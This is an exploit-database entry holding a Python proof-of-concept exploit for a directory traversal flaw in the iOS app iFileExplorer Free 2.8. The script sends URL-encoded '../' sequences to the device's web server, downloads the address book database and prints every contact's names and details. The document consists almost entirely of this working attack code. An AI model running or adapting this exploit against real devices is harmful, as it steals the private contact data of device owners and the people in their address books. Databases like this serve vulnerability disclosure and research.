ZeroBox Vulnerability Database

# Exploit Title: iPod Touch/iPhone iFileExplorer Free Directory Traversal 

# Date: 04/03/2011 #UK date format 

# Author: theSmallNothing 

# Software Link: http://itunes.apple.com/gb/app/ifileexplorer-protect-multi/id355253462?mt=8 

# Version: 2.8 

# Tested on: iPod Touch 2G (4.1) 

  

import urllib, sqlite3 

  

base = "http://192.168.0.3/" #Change to iDevice ip 

url = base + "..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/var/mobile/Library/AddressBook/AddressBook.sqlitedb" #Jailbroken Address 

  

try: 

    urllib.urlretrieve(url,"addressbook.sqlite") 

    print "Grabbed Address Book\n"

except: 

    print "Could not grab address book…"

  

conn = sqlite3.connect("addressbook.sqlite") 

cursor = conn.cursor() 

cmd = "SELECT * FROM ABPerson"

cursor.execute(cmd) 

results = cursor.fetchall() 

for person in results: 

    if person[1] == None: 

        continue

    print person[1], person[2] 

      

    cmd = "SELECT * FROM ABMultiValue WHERE record_id="+str(person[0]) 

    cursor.execute(cmd) 

    vunDataArr = cursor.fetchall() 

    for vunData in vunDataArr: 

        if vunData[5] != None: 

            print "\t"+vunData[5]